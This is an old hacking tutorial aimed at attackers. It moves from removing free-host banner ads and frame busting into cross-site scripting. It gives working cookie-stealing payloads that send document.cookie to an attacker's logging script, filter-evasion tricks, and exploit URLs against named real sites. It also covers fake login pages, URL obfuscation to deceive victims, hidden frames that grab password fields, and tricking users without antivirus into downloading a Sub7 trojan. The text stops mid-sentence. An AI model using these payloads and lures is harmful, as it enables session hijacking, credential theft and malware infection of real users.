I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page.  The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner.  There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key".  What I mean by this is what tag does the banner they add come before or after?  Try putting up a page with just:
<html>
<!-- blah -->
<body>
<!-- blah -->
text
<!-- blah -->
</body>
<!-- blah -->
</html>
now upload that page and view it in a browser.  View the source of the page and find where the site added it's banner html.  If it came after the <html> and before the <body> then you need to see if it came before or after the <!-- blah --> which is in between those.  If it is before, then it is the <html> tag that is the key tag which the site adds it's banner after.  If it is under the <!-- blah --> than you know it puts it after the <body> tag.
So now that we know where the site adds it's banner html what do we do to stop it?  We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead.  Then we use javascript to print the real one.  We can do a few things, here is the list:
  • the basic <noscript> - this used to work, as most banners or popups start with some javascript, but now free sites have gotten smart and automaticly add a </noscript> to stop it.
    <noscript>
    <keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
    </noscript>
    <keytag> -this keytag is the real one.
  • <script> , <style> , <xml> - these are a few examples of tags that will make the add on html and javascript of the site's banner not render by the browser.  since it is not in the syntax of css, xml or javascript (it is html) user's browsers will just ignore it.
    <style>
    <keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
    </style>
    <keytag> -this keytag is the real one.
  • printing tags with javascript - this one was thought up by acecww and works really well, if you are having problems when you put the real keytag then try using javascript so the site doesn't even see it as the keytag.  you get javascript to print the tags one letter at a time.
    <script type="javascript">
    <!--
    document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>');
    //-->
    </script>
    <style>
    <keytag> -this keytag is the decoy. Before/after this tag is where the banner would be.
    </style>

If all worked out you should have a page with no annoying popups or flashing banners.  If not I guess you will have to play around a little and figure it out for yourself.  Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.
I decided to go over a real example of a free site that add popup ads or banners to every page you have.  I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat.  Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing.  Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning.  Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>
<!-- Beginning of Angelfire Ad Code Insertion -->
</noscript>
<script language="JavaScript">
<!--
(this is where the angelfire ad script would be.)
//-->
</script>
<!-- End of Angelfire Ad Code Insertion -->
<p> rest of test page</p>
</body>
</html>
------------------------
end
------------------------
as you can see angelfire puts their ad right after the <body> tag.  All they are using to protect us from getting rid of the ad is a </noscript> so.. we can put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So angelfire's server will add the javascript for thier advertisment after the first <body> they see.  That will put the ad after <style><body> and before </style>.  This means that user's browsers will think that <body> and the angelfires ad is css (cascading style sheet).. which is the <style> tag.  Since javascript and html cannot be in css the browser ignores it.  We then put the real <body> after this and continue with our site.
About a month after I wrote this I came up with an idea of how to complete remove the advertisments sites put on your pages.  I am not 100% sure it will work, but the basic idea is to have a cgi script open all the .html pages in your directory, remove the ad, and write the html back to the .html files.  Few things might affect how well this works.  First if the script that adds the ad to the .html files is a cron job, but I doubt this, since it would put heavy strain on the system to search and write to all those files.  Second, the script might be ran whenever a .html file is editted, I am hoping that it is only ran when a file is created or a file is uploaded.  I'll test this out someday, if you want this script come bother me on irc about it and I might finish it =)
Killing Frames
Now I'll go over how to kill frames.  The reason you would need this script is to hack namezero, nbci, and other companies which put your page in a frame.  Killing a frame means to get rid of it so that your site is the one filling the whole window.
There is one solid way which has always worked for doing this.  Not only will it bust out of companies frames.. But if some lamer is leeching your site by using frames this will stop them.  The script is as follows:
<script type="javascript">
if (self != top) top.location.replace(self.location);
//-->
</script>
What this script does is checks if the current page is not the top (first) frame, if it isn't then it puts itself as the top frame, deleting the other frame from the browser window.  Pretty handy trick =)

Lets say we are entering info to a guestbook.  This would be put on the main page of the guestbook. And whenever anyone visited that page we want them to be sent to http://www.lameindustries.org. We would enter this in the guestbook:
<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
Sometimes when you want to use javascript there is some form of filtering going on that stops the <script> tag from being rendered as usual. For those of you who know perl I will demonstrate.
[Line from a perl script that filters input for the <script> tag]
$input = s/<script/&lt;script/ig;
$input is what you submitted to the perl script, what it is doing is looking for <script in your input and replacing it with &lt;script.  So how do you get around this?  We can use the hex value of any or all characters in <script type="javascript">  the only characters you cannot do this for are the < and the > because they would not be rendered by the browser if you did. So now we enter something like this into the guestbook:
<&#115;cript type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
How did I know what the hex value of 's' was?  I just checked an ascii chart and added & before it and ; after it.  You can use this in the url of your browser as well, just put % before the number.  A chart ascii chart is available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml or man ascii if you run *nix.
There are a few other situations where javascript can be useful.  If you can get around the filter on a users email you can use your spoofing email skills to send an email from someone they trust.  If they open it you can have the email redirect them to a page which says something like "session timed out, please login in again" and have that form submitted to a cgi script that logs it.  This works for a small percentage of people, but it is worth a shot sometimes.
Getting by javascript filters can lead to you getting cookies for such things as forums, shopping carts, sites, and redirecting users to the site of your choice.  Anywhere there is input that is displayed on a page which other people may visit (or you can make them visit) there is an opportunity to use javascript to steal information.  Infact just today as I am writing this it was found that lycos and other search engines are vulnerable to javascript in website's descriptions and names, read the slashdot story for more info.  This could lead to 100% clicks for any search your site turns up on ;).
Here is a cert advisory concerning insertion of scripts (javascript, vbscript, etc..) inputted into scripts:
http://www.cert.org/advisories/CA-2000-02.html
update: there has been a new advisory for hotmail and other sites which filter javascript.  The problem lays in css and the use of the <link> tag.  When the following code is used the linked javascript will be executed, making it possible to steal cookies, info, or redirect users to a fake login page.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="script.js">
put that in the body, preferably as the first thing.  Of course hotmail patched it days after it was reported, but it stand to show that hotmail is not 100% secure and there will still be ways in the future to get scriptting executed.  Also other web based email, guestbook, message boards, etc.. might be vulnerable to this.  You can use old hotmail exploits on many other scripts that allow input and print them to a .html file.  I found this vulnerability in a script that cyberarmy.com ran for their web based mail, I just did a <&#115;cript type="java&#115;cript"> and redirected the user to a fake login page.  When they logged in with their user and password it sent them to a script that wrote their info to a database and then logged them into the web based email script again.  The script was made by solutionscripts, and cyberarmy is no longer vulnerable.
Also note that normal text field input is not the only way to insert data into a script.  Hidden fields and environment variables are also sometimes vulnerable.  Some scripts will filter all the text fields, but will not filter the hidden fields, this allows you to insert javascript or other nasty things.  I won't go to much into that since it would require a whole nother tutorial and because writting javascript isn't the first thing you would try to exploit with that.  Environment variables that you can exploit are usually referrer or user-agent, since those tend to be the only ones ever written to a file, they are also the least filtered input in my experience.  It's much easier to find ways to insert javascript if you can get ahold of the source of the script.  There are two easy ways to do this, the first is to see if the script is open source, then go download and review the code for holes.  The other is to look for other scripts/exploits that allow you to view the source of other scripts.  So do some research for other exploits in other scripts (or the webserver itself).

note: to do this you'll need a little bit of advanced javascript knowledge, and some perl/php/asp (or other server side language).
Stealing cookies can be a dangerous problem for many sites.  It all depends on how the site sets up it's security.  If a site just uses cookies to identify users than it could be vulnerable.  If you need to login then it is almost useless to try and steal cookies.  Unless of course the username and passwords are stored in the cookie and is not encrypted. Sometimes you are allowed access without logging in.  We will pick on http://neworder.box.sk since they stold some LI tutorials, even though they are not vuln to this because you must login to their site and the user password is not in the cookie.  (Lets see if they steal a tutorial which explains how to exploit a hole in one of their scripts ;)   How we will be exploiting this bug is simple.  Luckily cube left us a vulnerable script on the site to play with. The script is http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script?  It doesn't escape the inputted characters that are printed to the page. I told you escaping characters is important.  The script instead relies on a simple <pre> tag to stop javascript.  So the first thing we must do is test and see what character's (if any) are left unescaped for us to use.  After a check for these characters: ' " ; | < > / and % we find that he does escape ' and ".  If he didn't we could exploit the php script itself and have total control over the site.  I will get to a little trick in a second where we can get javascript to print out ' and ".  But for now we must stop that <pre> tag.  So we end it with a </pre> then insert any javascript we would like.
In the first paragraph I said that javascript is mostly secure, because it cannot read or write any files off a users hard drive besides cookies.  Here we will use javascript to read the user's cookie for neworder  and then use javascript to send them to a cgi script where we log their cookie to a txt file.  After this we check the log from the cgi script and save the cookie where our browser keeps them.  Or we can get the username and password from the cookie and login to the site (neworder doesn't keep the user's password in the cookie).
So now to print the javascript that will steal the cookie.  What we are doing is using the script that prints out unescaped characters to the page as if it was javascript that was really on that website.  So we can view and edit user cookies.  There are two main problems we must overcome.  First we need to print a string without using ' and " since the .php script on neworder does escape those characters.  How we do this is by using javascript which doesn't need ' or " and prints out any character.  This is one way to do it:
<script type=text/javascript> var u = String.fromCharCode(0x0068); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070); u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0073); u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F); u %2B= String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067); u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F); u %2B= document.cookie; document.location.replace(u); //-->
</script>
We need to use %2B instead of + because + becomes a space when you go to the script.  There is probably an easier way of doing this besides using fromCharCode, but I couldn't think of any =)  The 0x0068 is ascii for h.  74 is t.. (You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html ):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e 2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=. 63=c 67=g 69=i 3F=? In other words it makes the var u equal to the string http://site.com/a.cgi?
All right, so we got a string in a variable without using ' or ".  var u = 'http://site.com/a.cgi?'; would be the same thing if the script didn't filter for ' and ".  So now that we got the string going what should we do?  Well what we are trying to do is get the cookie in a string and then send them to a cgi script that logs what's in the cookie.  document.cookie is the cookie for that site.  If there is more than one cookie then you have to use a little trickery.  try this page for learning how to handle multiple cookies. Now we need to add the cookie to the end of the url.  So:
u %2B= document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie (but user_s_cookie is actually the value in their cookie).  So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be a cgi script that just logs whatever is inputted to it into a database.  Another way to log their cookie would be to put something like:
<img src="http://site.com/somedir/(document.cookie)"> But since this script filters ' and " it would be a really long url to put fromCharCode's for every character.. Also, you would have to have access to the logs of the site in order to check what files were requested from 'somedir' directory.
All cookie stealing techniques require some kind of script on your website to log the cookie when it is sent as a url.
Once you have a user's cookie there are 2 things it can be used for.  Sometimes sites put their username and password right in the cookie.  In this case you can just log into the site with that.  Some other sites just simply use a cookie to authenticate users. No login required.
Take for example www.geocities.com .. If you get a 404 error it will print out the url:
like this
now if you have a cookie of a geocities member you can go to www.geocities.com and you will automatically be logged in.  From there you have full control over their account.
But geocities did do something to stop this. They have their website go to http://geocities.yahoo.com .. So the cookie for users is actually a yahoo cookie ;(  If you try the same trick where you go to a 404 file on yahoo it won't print the < and > characters.  But if you were to find a script on yahoo that printed out < and > you could easily do this =)  And there are scripts on yahoo.com which are vuln to cross site scriptting, a few have been reported to bugtraq and I found another one.
So how would you get users to visit these urls?  Try things like ...
Yeah all you redlite players, check out this hidden pick, funny as hell: Check this page out! Or better yet.. Load it in a frame that is 0% large.  The user won't even know what hit them =)
oh, the source for that redlite link is:
<a href="http://www.redlite.org/signup/signup2.php?username=<script type=text/javascript>var u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u %2B= document.cookie;document.location.replace(u);</script>" onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true" onMouseOut="window.status='';return true"> Check this page out! </a>
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
and
onMouseOut="window.status='';return true"
at the end.. This is to trick the user into thinking that the link leads somewhere else.  Again, using javascript to manipulate what the user sees to help trick them.
Another script in the edge engine that is vulnerable to cross site scriptting is board.php, here is the exploit
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0
sure am glad bsrf doesn't run it ;-)
So how can a coder stop this vulnerablitiy?  I would say never print user inputted data back to the user.  also filter out <, >, and pack all url encoding before filtering input.  I found a way to steal cookies in the old ikonboard using the profile.cgi, although it wasn't too big a deal since there was more serious holes in ikonboard it still way bad programming practice to print unfiltered input.  Now ikonboard does not use profile.cgi, it doesn't print inputted data to the screen, and it filters data.   Usually web based email scripts are very vulnerable to cross site scriptting.. and that holds true for a vulnerability in solution script's alais-mail script that I found last year.
A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/ - A hotmail exploit.  Since hotmail didn't filter javascript and allowed .html attachments to be viewed and not downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/ - Opening the cookie jar, remote cookie viewer.  using %2F instead of / makes ie think it's a intranet site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp - Actually active scriptting, not javascript.
Then there is the new about:// and file content reading vulns in ie that have been reciently posted to bugtraq.. I plan on discussing these in detail when I update this tutorial.
Most people say to me, "but no one with any clue about security is going to click on the link which has javascript to steal cookies" and this is true. When the plain url is http://site.com/vulnscript.cgi? document.location.relace('http://hacker.com/logger.php?' + document.cookie); That is why we need to trick them into thinking the url isn't dangerous. Here is one way:
obscuring urls:
One way of tricking a user into clicking a link they thought lead somewhere else was to use that onmouseover trick to make the url look like it is pointting somewhere else. Obviously you cannot use this while on protocols that do not support html or that completely block javascript and onmouseover. So instead of http://site.com you can have http://127.0.0.1 this might not help too much so how about we use alittle trick. When browsers login to .htaccess directories they can use the following syntax:
http://username: password@site.comThis e-mail address is being protected from spambots. You need JavaScript enabled to view it
You'll see why this is important in a minute. Without the password you can have things like:
http:// username@site.comThis e-mail address is being protected from spambots. You need JavaScript enabled to view it
and it will work fine. It will try to login to site.com with the username = 'username' and no password. Now what happends if there is no .htaccess file? Then it doesn't matter what the username or password is, and the page loads normal. So something like this could be used:
http://microsoft.com/site/dir/ helpdesk.asp@site.comThis e-mail address is being protected from spambots. You need JavaScript enabled to view it
You see how this could be used to get people to click on a link thinking it leads somewhere else? Even if it is in plain text many people will beleive this link goes to microsoft.com. Now that we have a link lets obscure it a bit =)
There are many different ways to obscure urls from users to help aid you into tricking them. One of them involves converting ip addresses into their decimal equivilants. I am not going to cover this, but there are plenty of other tutorials on the net where you can learn. I'll just let you use this script to automaticly convert ip addresses to the decimal value.
IPa IPb IPc IPd =
Now use this instead of site.com and you get something like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [insert nasty javascript url encoded here]
now that does not look like http://site.com/a.cgi? nasty javascript
which would be very clear for users to tell what it is doing. Lets go over the steps one more time, just to be sure you got it. First make up any site name (doesn't have to be valid url)
http://aol.com/scripts/userid.jsp?
Add a @ to the end
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form
http://aol.com/scripts/userid.jsp?@3639550308
then the rest of the path in urlencoding.
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end. This is just one method of obscuring the url, there are others.

Ok, this method will not be used very often, and isn't too valuable a skill to the average hacker.. But it can come in very handy.  This was originally a news post on my site, but it fits into this tutorial nicely.  I know that this part might be very poorly explained and many people won't understand how it works.  But I have tried to atleast make it so people with advanced javascript knowledge can make some sense of how the attack works.  Also note that this attack is purely theory, I have not used this against an actual site yet.  It might even be used against sites which require you to fill in a form to login, this means hotmail, yahoo, and 100,000,000 other sites, but it would require extra coding, some of which I am not sure if it is possible.
Ok, in this article I will explain how to steal info from users by using javascript.
What this exploit requires is: A script that prints info you want into an input field. 
The script doesn't check the referrer.
The most used reason for this would be to get usernames and passwords from sites.  An example of this would be cyberarmy.com which was vulnerable to this for along time.  You will notice that if we did have the user's cookie that we could have simply viewed this page and gotten their password, but cyberarmy was pretty secure in not printing unescaped data to the user's browser.
Now we will be doing this:
1 main page with 2 frames.
frame #1 - will look like a normal page and will steal the info from frame #2.
frame #2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><!--
document.write('<frameset cols="10%,*" frameborder="yes" framespacing="0" border="3">');
//for the example we are using cols="10%.*" but in a real life attack you would use cols="0px,*" or something, as to hide the frame that is stealing the form value.
document.write('<frame src="fuckca.html" scrolling="no" noresize name=blah>');
document.write('<frame src="userconfig.html" scrolling="auto" noresize name=vulnscript>');
document.write('<\/frameset>');
//You might be wondering why I used javascript to print the <frameset>.  This was done so we can print more javascript on the page.  (the javascript that steals the form value.
printhtml(0);
function printhtml(counter){
if (counter == 0) {
var the_timeout = setTimeout("printhtml(1);",11000);
counter++;
}
var thehtml = window.vulnscript.document.all.tags('HTML')[0].innerHTML;
window.vulnscript.document.open("text/html");
window.vulnscript.document.writeln(thehtml.substring(0,thehtml.indexOf('RAID</A>')+8));
window.vulnscript.document.writeln('--><script language="javascript">');
window.vulnscript.document.writeln('location.replace(http://www.cyberarmy.com/zebulun/userconfig.pl);');
window.vulnscript.document.writeln('<\/script><!--');
window.vulnscript.document.writeln(thehtml.substring(thehtml.indexOf('<TABLE border=0 cellPadding=0 cellSpacing=3 width=90%>')-1, thehtml.indexOf('</html>')+7));
window.vulnscript.document.close();
}
//-->
</script>
</html>
-------- end --------
of course in real use the size of the cols would be set so frame #2 (vulnscript) would be 0%.. So that the user wouldn't even know what is happening.
Now this is what the fuckca.html is:
-------- begin --------
<html><body>
<script type="text/javascript">
<!--
var name1 = parent.vulnscript.document.forms[0].pass1.value;
parent.blah.document.write(name1);
//-->
</script>
</body></html>
-------- end --------
all this does is print out the value of the first (unnamed) form from the frame named vulnscript (the one that has the page where we want to steal data from).
This is what their userconfig.pl displayed that we were grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1" MAXLENGTH=16 value="testpass">
The problem is that it would display the password in plain text (value="testpass" - testpass is the password) why it did this I don't know, stupid programming I guess.  But if you got a hold of someone's cookie you could view that script and it would give you the pass.. So what this little trick with frames and javascript does is make users visit the page without knowing and then lets our javascript grab their password.  Instead of printing the password to frame #1 (name=blah) we could have sent an invisible frame to a script which logs input.  Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace(log.cgi?name1);
I would then tell a few people who I want passwords from about this page, say "hey, want to see a picture of my girlfriend?" (All hackX0r guys like pics of girls)  then I would just put up some stupid pic.. Maybe Britney Spears or something. The log.cgi would log both name1 (their password) and $ENV{'REMOTE_ADDR'} (their ip address).  This would let me match up usernames to passwords fairly easy.  You could also get their username from grabbing it off the page, or from the contents of the cookie.
This attack is fairly complicated, so I didn't explain why I did a few things. I figure anyone who could actually pull this off would understand why.  Also not many sites are vuln to this, and even the ones that are usually the attacker does not have the ability to hop on the irc channel and trick people into viewing it.

Ok, this is probably the least likely technique in this tutorial to be used.  All the rest can be used fairly often.  This one is used to gain enough info on someone in order to form a trojan attack on them.  What this javascript will allow us to do is to probe their system and see if they have any security against our attack.  It will let us see what anti-virus program they use, what firewall they use, and if they have any programs that allow us to infect them with macros.
This was originally a bugtraq post: ( http://www.securityfocus.com/archive/1/224673 ) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html but we are going to probe for more security related programs. (put a probe for anti-virus programs, firewalls, word, adobe acrobat [pdf])
Lets say we check for anti-virus programs, if they don't have any you can display a link to download sub7 and say it is a video game... if they do have an anti-virus program you can display the link to the real game.  This way you don't have to worry about the user finding out that you tried to send them a trojan.  Only users who don't have an anti-virus program will have downloaded the trojan.
One possible future for trojan's is modules that you can insert to attack specific programs.  For instance if you know the user is running a certain type of anti-virus program and they are running a certain type of firewall you can plug those modules into the trojan.  When the user downloads and runs this trojan the modules will trojan those anti-virus and firewall making them seem as if they are running fine, when they aren't.  Ether they won't detect your trojan or they will replace them with a emtpy program that just puts the icons in the taskbar and task list.  I will try to get a working deminstration of how javascript can be used to download the correct trojan for a user's system or detect if the trojan will be detected by an anti-virus program so it will make them download a regular file.
If you have a firewall or anti-virus program please send me the full address (absolute address) to all the images it has.  email th